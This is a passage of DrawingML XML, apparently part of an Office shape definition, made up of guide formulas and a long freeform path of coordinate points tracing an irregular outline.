                  <a:gd name="T84" fmla="*/ 552 w 619"/>
                  <a:gd name="T85" fmla="*/ 367 h 652"/>
                  <a:gd name="T86" fmla="*/ 536 w 619"/>
                  <a:gd name="T87" fmla="*/ 404 h 652"/>
                  <a:gd name="T88" fmla="*/ 507 w 619"/>
                  <a:gd name="T89" fmla="*/ 452 h 652"/>
                  <a:gd name="T90" fmla="*/ 466 w 619"/>
                  <a:gd name="T91" fmla="*/ 456 h 652"/>
                  <a:gd name="T92" fmla="*/ 427 w 619"/>
                  <a:gd name="T93" fmla="*/ 481 h 652"/>
                  <a:gd name="T94" fmla="*/ 402 w 619"/>
                  <a:gd name="T95" fmla="*/ 502 h 652"/>
                  <a:gd name="T96" fmla="*/ 402 w 619"/>
                  <a:gd name="T97" fmla="*/ 541 h 652"/>
                  <a:gd name="T98" fmla="*/ 372 w 619"/>
                  <a:gd name="T99" fmla="*/ 594 h 652"/>
                  <a:gd name="T100" fmla="*/ 368 w 619"/>
                  <a:gd name="T101" fmla="*/ 587 h 652"/>
                  <a:gd name="T102" fmla="*/ 346 w 619"/>
                  <a:gd name="T103" fmla="*/ 612 h 652"/>
                  <a:gd name="T104" fmla="*/ 328 w 619"/>
                  <a:gd name="T105" fmla="*/ 634 h 652"/>
                  <a:gd name="T106" fmla="*/ 299 w 619"/>
                  <a:gd name="T107" fmla="*/ 606 h 652"/>
                  <a:gd name="T108" fmla="*/ 273 w 619"/>
                  <a:gd name="T109" fmla="*/ 584 h 652"/>
                  <a:gd name="T110" fmla="*/ 304 w 619"/>
                  <a:gd name="T111" fmla="*/ 538 h 652"/>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619"/>
                  <a:gd name="T169" fmla="*/ 0 h 652"/>
                  <a:gd name="T170" fmla="*/ 619 w 619"/>
                  <a:gd name="T171" fmla="*/ 652 h 652"/>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619" h="652">
                    <a:moveTo>
                      <a:pt x="307" y="504"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="306" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="501" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="601" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="168"/>
                    </a:lnTo>
